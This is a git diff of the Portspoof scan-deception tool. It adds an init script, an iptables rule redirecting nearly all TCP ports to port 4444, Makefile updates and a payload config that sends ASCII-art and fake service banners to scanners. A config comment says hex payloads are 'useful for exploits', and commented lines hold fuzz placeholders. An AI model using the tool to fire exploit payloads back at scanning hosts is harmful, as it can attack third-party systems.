zem<@ulZcFPQ@L2!n>{z**++&mCkOWA81W14cNZlEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ zLs35+`xjp>T0/dev/null; then + echo "Starting Portspoof..." + /usr/local/bin/portspoof -D -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures + else + echo "Portspoof already running.." + fi + +;; + +stop) + + if pidof portspoof >/dev/null; then + killall -9 /usr/local/bin/portspoof >/dev/null + echo "Portspoof stopped.." + else + echo "Portspoof not running.." + fi +;; + +restart) + $0 stop + $0 start +;; + +*) + echo "Usage: $0 {start|stop|restart}" + exit 1 +esac \ No newline at end of file diff --git a/system_files/iptables-config b/system_files/iptables-config new file mode 100755 index 0000000..1b18720 --- /dev/null +++ b/system_files/iptables-config @@ -0,0 +1,18 @@ +# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:41 2013 +*nat +:PREROUTING ACCEPT [5992:539002] +:INPUT ACCEPT [347451:16935290] +:OUTPUT ACCEPT [477:45868] +:POSTROUTING ACCEPT [0:0] +-A PREROUTING -i eth1 -p tcp -m tcp --dport 1:21 -j REDIRECT --to-ports 4444 +-A PREROUTING -i eth1 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444 +COMMIT +# Completed on Tue Apr 23 14:26:42 2013 +# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:42 2013 +*filter +:INPUT ACCEPT [1931192:104113948] +:FORWARD ACCEPT [0:0] +:OUTPUT ACCEPT [1606583:151106362] +-A FORWARD -j ACCEPT +COMMIT +# Completed on Tue Apr 23 14:26:42 2013 diff --git a/tools/Makefile b/tools/Makefile old mode 100644 new mode 100755 index dddd749..36ab60d --- a/tools/Makefile +++ b/tools/Makefile @@ -1,8 +1,9 @@ -# Makefile.in generated by automake 1.10 from Makefile.am. +# Makefile.in generated by automake 1.11.1 from Makefile.am. # tools/Makefile. Generated from Makefile.in by configure. # Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, -# 2003, 2004, 2005, 2006 Free Software Foundation, Inc. +# 2003, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, +# Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. @@ -16,8 +17,9 @@ pkgdatadir = $(datadir)/portspoof -pkglibdir = $(libdir)/portspoof pkgincludedir = $(includedir)/portspoof +pkglibdir = $(libdir)/portspoof +pkglibexecdir = $(libexecdir)/portspoof am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c @@ -30,8 +32,8 @@ POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : -build_triplet = i386-apple-darwin11.4.0 -host_triplet = i386-apple-darwin11.4.0 +build_triplet = i686-pc-linux-gnu +host_triplet = i686-pc-linux-gnu subdir = tools DIST_COMMON = $(srcdir)/Makefile.am $(srcdir)/Makefile.in ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 @@ -41,6 +43,7 @@ am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = +CONFIG_CLEAN_VPATH_FILES = SOURCES = DIST_SOURCES = am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`; @@ -48,31 +51,48 @@ am__vpath_adj = case $$p in \ $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \ *) f=$$p;; \ esac; -am__strip_dir = `echo $$p | sed -e 's|^.*/||'`; +am__strip_dir = f=`echo $$p | sed -e 's|^.*/||'`; +am__install_max = 40 +am__nobase_strip_setup = \ + srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'` +am__nobase_strip = \ + for p in $$list; do echo "$$p"; done | sed -e "s|$$srcdirstrip/||" +am__nobase_list = $(am__nobase_strip_setup); \ + for p in $$list; do echo "$$p $$p"; done | \ + sed "s| $$srcdirstrip/| |;"' / .*\//!s/ .*/ ./; s,\( .*\)/[^/]*$$,\1,' | \ + $(AWK) 'BEGIN { files["."] = "" } { files[$$2] = files[$$2] " " $$1; \ + if (++n[$$2] == $(am__install_max)) \ + { print $$2, files[$$2]; n[$$2] = 0; files[$$2] = "" } } \ + END { for (dir in files) print dir, files[dir] }' +am__base_list = \ + sed '$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;s/\n/ /g' | \ + sed '$$!N;$$!N;$$!N;$$!N;s/\n/ /g' am__installdirs = "$(DESTDIR)$(sysconfdir)" -sysconfDATA_INSTALL = $(INSTALL_DATA) DATA = $(sysconf_DATA) DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) -ACLOCAL = ${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run aclocal-1.10 -AMTAR = ${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run tar -AUTOCONF = ${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run autoconf -AUTOHEADER = ${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run autoheader -AUTOMAKE = ${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run automake-1.10 -AWK = awk +ACLOCAL = ${SHELL} /root/portspoof1/auto/missing --run aclocal-1.11 +AMTAR = ${SHELL} /root/portspoof1/auto/missing --run tar +AUTOCONF = ${SHELL} /root/portspoof1/auto/missing --run autoconf +AUTOHEADER = ${SHELL} /root/portspoof1/auto/missing --run autoheader +AUTOMAKE = ${SHELL} /root/portspoof1/auto/missing --run automake-1.11 +AWK = gawk CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 CPP = gcc -E CPPFLAGS = +CXX = g++ +CXXDEPMODE = depmode=gcc3 +CXXFLAGS = -g -O2 CYGPATH_W = echo DEFS = -DHAVE_CONFIG_H DEPDIR = .deps -ECHO_C = \c -ECHO_N = +ECHO_C = +ECHO_N = -n ECHO_T = -EGREP = /usr/bin/grep -E +EGREP = /bin/grep -E EXEEXT = -GREP = /usr/bin/grep +GREP = /bin/grep INSTALL = /usr/bin/install -c INSTALL_DATA = ${INSTALL} -m 644 INSTALL_PROGRAM = ${INSTALL} @@ -82,57 +102,59 @@ LDFLAGS = LIBOBJS = LIBS = LTLIBOBJS = -MAKEINFO = ${SHELL} /Users/k1wi/Desktop/portspoof/auto/missing --run makeinfo -MKDIR_P = ../auto/install-sh -c -d +MAKEINFO = ${SHELL} /root/portspoof1/auto/missing --run makeinfo +MKDIR_P = /bin/mkdir -p OBJEXT = o PACKAGE = portspoof -PACKAGE_BUGREPORT = piotr at duszynski.eu +PACKAGE_BUGREPORT = piotr@duszynski.eu PACKAGE_NAME = portspoof -PACKAGE_STRING = portspoof 0.1 +PACKAGE_STRING = portspoof 0.4 PACKAGE_TARNAME = portspoof -PACKAGE_VERSION = 0.1 +PACKAGE_URL = +PACKAGE_VERSION = 0.4 PATH_SEPARATOR = : SET_MAKE = SHELL = /bin/sh STRIP = -VERSION = 0.1 -abs_builddir = /Users/k1wi/Desktop/portspoof/tools -abs_srcdir = /Users/k1wi/Desktop/portspoof/tools -abs_top_builddir = /Users/k1wi/Desktop/portspoof -abs_top_srcdir = /Users/k1wi/Desktop/portspoof +VERSION = 0.4 +abs_builddir = /root/portspoof1/tools +abs_srcdir = /root/portspoof1/tools +abs_top_builddir = /root/portspoof1 +abs_top_srcdir = /root/portspoof1 ac_ct_CC = gcc +ac_ct_CXX = g++ am__include = include am__leading_dot = . am__quote = am__tar = ${AMTAR} chof - "$$tardir" am__untar = ${AMTAR} xf - bindir = ${exec_prefix}/bin -build = i386-apple-darwin11.4.0 +build = i686-pc-linux-gnu build_alias = -build_cpu = i386 -build_os = darwin11.4.0 -build_vendor = apple +build_cpu = i686 +build_os = linux-gnu +build_vendor = pc builddir = . datadir = ${datarootdir} datarootdir = ${prefix}/share docdir = ${datarootdir}/doc/${PACKAGE_TARNAME} dvidir = ${docdir} exec_prefix = ${prefix} -host = i386-apple-darwin11.4.0 +host = i686-pc-linux-gnu host_alias = -host_cpu = i386 -host_os = darwin11.4.0 -host_vendor = apple +host_cpu = i686 +host_os = linux-gnu +host_vendor = pc htmldir = ${docdir} includedir = ${prefix}/include infodir = ${datarootdir}/info -install_sh = $(SHELL) /Users/k1wi/Desktop/portspoof/auto/install-sh +install_sh = ${SHELL} /root/portspoof1/auto/install-sh libdir = ${exec_prefix}/lib libexecdir = ${exec_prefix}/libexec localedir = ${datarootdir}/locale localstatedir = ${prefix}/var mandir = ${datarootdir}/man -mkdir_p = $(top_builddir)/auto/install-sh -c -d +mkdir_p = /bin/mkdir -p oldincludedir = /usr/include pdfdir = ${docdir} prefix = /usr/local @@ -143,6 +165,7 @@ sharedstatedir = ${prefix}/com srcdir = . sysconfdir = ${prefix}/etc target_alias = +top_build_prefix = ../ top_builddir = .. top_srcdir = .. EXTRA_DIST = portspoof.conf signatures @@ -155,14 +178,14 @@ $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ - cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \ - && exit 0; \ + ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ + && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ - echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu tools/Makefile'; \ - cd $(top_srcdir) && \ - $(AUTOMAKE) --gnu tools/Makefile + echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu tools/Makefile'; \ + $(am__cd) $(top_srcdir) && \ + $(AUTOMAKE) --gnu tools/Makefile .PRECIOUS: Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ @@ -180,23 +203,27 @@ $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh +$(am__aclocal_m4_deps): install-sysconfDATA: $(sysconf_DATA) @$(NORMAL_INSTALL) test -z "$(sysconfdir)" || $(MKDIR_P) "$(DESTDIR)$(sysconfdir)" - @list='$(sysconf_DATA)'; for p in $$list; do \ + @list='$(sysconf_DATA)'; test -n "$(sysconfdir)" || list=; \ + for p in $$list; do \ if test -f "$$p"; then d=; else d="$(srcdir)/"; fi; \ - f=$(am__strip_dir) \ - echo " $(sysconfDATA_INSTALL) '$$d$$p' '$(DESTDIR)$(sysconfdir)/$$f'"; \ - $(sysconfDATA_INSTALL) "$$d$$p" "$(DESTDIR)$(sysconfdir)/$$f"; \ + echo "$$d$$p"; \ + done | $(am__base_list) | \ + while read files; do \ + echo " $(INSTALL_DATA) $$files '$(DESTDIR)$(sysconfdir)'"; \ + $(INSTALL_DATA) $$files "$(DESTDIR)$(sysconfdir)" || exit $$?; \ done uninstall-sysconfDATA: @$(NORMAL_UNINSTALL) - @list='$(sysconf_DATA)'; for p in $$list; do \ - f=$(am__strip_dir) \ - echo " rm -f '$(DESTDIR)$(sysconfdir)/$$f'"; \ - rm -f "$(DESTDIR)$(sysconfdir)/$$f"; \ - done + @list='$(sysconf_DATA)'; test -n "$(sysconfdir)" || list=; \ + files=`for p in $$list; do echo $$p; done | sed -e 's|^.*/||'`; \ + test -n "$$files" || exit 0; \ + echo " ( cd '$(DESTDIR)$(sysconfdir)' && rm -f" $$files ")"; \ + cd "$(DESTDIR)$(sysconfdir)" && rm -f $$files tags: TAGS TAGS: @@ -220,13 +247,17 @@ distdir: $(DISTFILES) if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ - if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ - cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \ + if test -d "$(distdir)/$$file"; then \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ - cp -pR $$d/$$file $(distdir)$$dir || exit 1; \ + if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ + cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ + fi; \ + cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ - test -f $(distdir)/$$file \ - || cp -p $$d/$$file $(distdir)/$$file \ + test -f "$(distdir)/$$file" \ + || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done @@ -257,6 +288,7 @@ clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) + -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @@ -275,6 +307,8 @@ dvi-am: html: html-am +html-am: + info: info-am info-am: @@ -283,18 +317,28 @@ install-data-am: install-dvi: install-dvi-am +install-dvi-am: + install-exec-am: install-sysconfDATA install-html: install-html-am +install-html-am: + install-info: install-info-am +install-info-am: + install-man: install-pdf: install-pdf-am +install-pdf-am: + install-ps: install-ps-am +install-ps-am: + installcheck-am: maintainer-clean: maintainer-clean-am @@ -328,6 +372,7 @@ uninstall-am: uninstall-sysconfDATA mostlyclean mostlyclean-generic pdf pdf-am ps ps-am uninstall \ uninstall-am uninstall-sysconfDATA + # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: diff --git a/tools/Makefile.am b/tools/Makefile.am old mode 100644 new mode 100755 index 3d182c7..3b7417f --- a/tools/Makefile.am +++ b/tools/Makefile.am @@ -1,7 +1,7 @@ ## Process this file with automake to produce Makefile.in -EXTRA_DIST = portspoof.conf signatures +EXTRA_DIST = portspoof.conf portspoof_signatures confdir= $(sysconfdir)/portspoof -sysconf_DATA=portspoof.conf signatures \ No newline at end of file +sysconf_DATA=portspoof.conf portspoof_signatures \ No newline at end of file diff --git a/tools/Makefile.in b/tools/Makefile.in index 7c527f6..caa3dea 100644 --- a/tools/Makefile.in +++ b/tools/Makefile.in @@ -1,8 +1,9 @@ -# Makefile.in generated by automake 1.10 from Makefile.am. +# Makefile.in generated by automake 1.11.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, -# 2003, 2004, 2005, 2006 Free Software Foundation, Inc. +# 2003, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, +# Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. @@ -16,8 +17,9 @@ VPATH = @srcdir@ pkgdatadir = $(datadir)/@PACKAGE@ -pkglibdir = $(libdir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ +pkglibdir = $(libdir)/@PACKAGE@ +pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c @@ -41,6 +43,7 @@ am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = +CONFIG_CLEAN_VPATH_FILES = SOURCES = DIST_SOURCES = am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`; @@ -48,9 +51,23 @@ am__vpath_adj = case $$p in \ $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \ *) f=$$p;; \ esac; -am__strip_dir = `echo $$p | sed -e 's|^.*/||'`; +am__strip_dir = f=`echo $$p | sed -e 's|^.*/||'`; +am__install_max = 40 +am__nobase_strip_setup = \ + srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'` +am__nobase_strip = \ + for p in $$list; do echo "$$p"; done | sed -e "s|$$srcdirstrip/||" +am__nobase_list = $(am__nobase_strip_setup); \ + for p in $$list; do echo "$$p $$p"; done | \ + sed "s| $$srcdirstrip/| |;"' / .*\//!s/ .*/ ./; s,\( .*\)/[^/]*$$,\1,' | \ + $(AWK) 'BEGIN { files["."] = "" } { files[$$2] = files[$$2] " " $$1; \ + if (++n[$$2] == $(am__install_max)) \ + { print $$2, files[$$2]; n[$$2] = 0; files[$$2] = "" } } \ + END { for (dir in files) print dir, files[dir] }' +am__base_list = \ + sed '$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;s/\n/ /g' | \ + sed '$$!N;$$!N;$$!N;$$!N;s/\n/ /g' am__installdirs = "$(DESTDIR)$(sysconfdir)" -sysconfDATA_INSTALL = $(INSTALL_DATA) DATA = $(sysconf_DATA) DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) ACLOCAL = @ACLOCAL@ @@ -64,6 +81,9 @@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ +CXX = @CXX@ +CXXDEPMODE = @CXXDEPMODE@ +CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ @@ -90,6 +110,7 @@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ +PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ SET_MAKE = @SET_MAKE@ @@ -101,6 +122,7 @@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_CC = @ac_ct_CC@ +ac_ct_CXX = @ac_ct_CXX@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ @@ -143,11 +165,12 @@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ +top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ -EXTRA_DIST = portspoof.conf signatures +EXTRA_DIST = portspoof.conf portspoof_signatures confdir = $(sysconfdir)/portspoof -sysconf_DATA = portspoof.conf signatures +sysconf_DATA = portspoof.conf portspoof_signatures all: all-am .SUFFIXES: @@ -155,14 +178,14 @@ $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ - cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \ - && exit 0; \ + ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ + && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ - echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu tools/Makefile'; \ - cd $(top_srcdir) && \ - $(AUTOMAKE) --gnu tools/Makefile + echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu tools/Makefile'; \ + $(am__cd) $(top_srcdir) && \ + $(AUTOMAKE) --gnu tools/Makefile .PRECIOUS: Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ @@ -180,23 +203,27 @@ $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh +$(am__aclocal_m4_deps): install-sysconfDATA: $(sysconf_DATA) @$(NORMAL_INSTALL) test -z "$(sysconfdir)" || $(MKDIR_P) "$(DESTDIR)$(sysconfdir)" - @list='$(sysconf_DATA)'; for p in $$list; do \ + @list='$(sysconf_DATA)'; test -n "$(sysconfdir)" || list=; \ + for p in $$list; do \ if test -f "$$p"; then d=; else d="$(srcdir)/"; fi; \ - f=$(am__strip_dir) \ - echo " $(sysconfDATA_INSTALL) '$$d$$p' '$(DESTDIR)$(sysconfdir)/$$f'"; \ - $(sysconfDATA_INSTALL) "$$d$$p" "$(DESTDIR)$(sysconfdir)/$$f"; \ + echo "$$d$$p"; \ + done | $(am__base_list) | \ + while read files; do \ + echo " $(INSTALL_DATA) $$files '$(DESTDIR)$(sysconfdir)'"; \ + $(INSTALL_DATA) $$files "$(DESTDIR)$(sysconfdir)" || exit $$?; \ done uninstall-sysconfDATA: @$(NORMAL_UNINSTALL) - @list='$(sysconf_DATA)'; for p in $$list; do \ - f=$(am__strip_dir) \ - echo " rm -f '$(DESTDIR)$(sysconfdir)/$$f'"; \ - rm -f "$(DESTDIR)$(sysconfdir)/$$f"; \ - done + @list='$(sysconf_DATA)'; test -n "$(sysconfdir)" || list=; \ + files=`for p in $$list; do echo $$p; done | sed -e 's|^.*/||'`; \ + test -n "$$files" || exit 0; \ + echo " ( cd '$(DESTDIR)$(sysconfdir)' && rm -f" $$files ")"; \ + cd "$(DESTDIR)$(sysconfdir)" && rm -f $$files tags: TAGS TAGS: @@ -220,13 +247,17 @@ distdir: $(DISTFILES) if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ - if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ - cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \ + if test -d "$(distdir)/$$file"; then \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ - cp -pR $$d/$$file $(distdir)$$dir || exit 1; \ + if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ + cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ + fi; \ + cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ - test -f $(distdir)/$$file \ - || cp -p $$d/$$file $(distdir)/$$file \ + test -f "$(distdir)/$$file" \ + || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done @@ -257,6 +288,7 @@ clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) + -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @@ -275,6 +307,8 @@ dvi-am: html: html-am +html-am: + info: info-am info-am: @@ -283,18 +317,28 @@ install-data-am: install-dvi: install-dvi-am +install-dvi-am: + install-exec-am: install-sysconfDATA install-html: install-html-am +install-html-am: + install-info: install-info-am +install-info-am: + install-man: install-pdf: install-pdf-am +install-pdf-am: + install-ps: install-ps-am +install-ps-am: + installcheck-am: maintainer-clean: maintainer-clean-am @@ -328,6 +372,7 @@ uninstall-am: uninstall-sysconfDATA mostlyclean mostlyclean-generic pdf pdf-am ps ps-am uninstall \ uninstall-am uninstall-sysconfDATA + # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: diff --git a/tools/portspoof.conf b/tools/portspoof.conf old mode 100644 new mode 100755 index 2afc83a..e079efc --- a/tools/portspoof.conf +++ b/tools/portspoof.conf @@ -1 +1,97 @@ -TO BE IMPLEMENTED \ No newline at end of file + +# This is an example Portspoof configuration file +# +# :Examples: +# +# 1. SINGLE PORT +# +# port "payload" +# +# 2. PORT RANGE +# +# port_nr_start-port_nr_start "payload" +# +# 3. PAYLOAD: Hex Encoded (useful for exploits) +# +# port "\x20\x20\x41\x41\x41 string payload" +# +# 4. PAYLOAD: Regular expressions +# +# port "regular_expression [\w]+ ..." + + +#Example: Send custom payload (this can be a simple string) + +1 "550 12345 0000000000000000000000000000000000000000000000000000000" +2 "550 12345 0000000000000000000000000000000000000000000000000000000" +3 "550 12345 0000000000000000000000000000000000000000000000000000000" +4 "550 12345 0000000000000000000000000000000000000000000000000000000" +5 "550 12345 0000000000000000000000000000000000000000000000000000000" +6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00" +7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00" +8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00" +9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00" +10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00" +11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00" +12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00" +13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00" +14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00" +15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00" +16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00" +17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00" +18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00" +19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00" +20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00" +21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00" +22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00" +23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00" +24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00" +25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00" +26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00" +27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00" +28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00" +29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00" +30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00" +31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00" +32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00" +33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00" +34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00" +35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00" +36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00" +37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00" +38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00" +39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00" +40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00" +41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00" +42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00" +43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00" +44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00" +45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00" +46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00" +47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00" +48 "550 12345 0000000000000000000000000000000000000000000000000000000" +49 "550 12345 0000000000000000000000000000000000000000000000000000000" +50 "550 12345 0000000000000000000000000000000000000000000000000000000" + +#Example: port range + +#51-60 "550 4m2v4 (FUZZ_HERE)" + +#Example: Simple regular expression payloads + +#8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n" +#8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n" +#8082 "word: ... \. \d \w \n" + +#Nmap regular expression matched payloads + +#8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n" +#8101 "220 FUZZ_HERE SMTP ready to roll\r\n" +#8102 "550 12345 FUZZ_HERE" +#8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n" +#8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nLog In - Juniper Web Device Manager
Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80
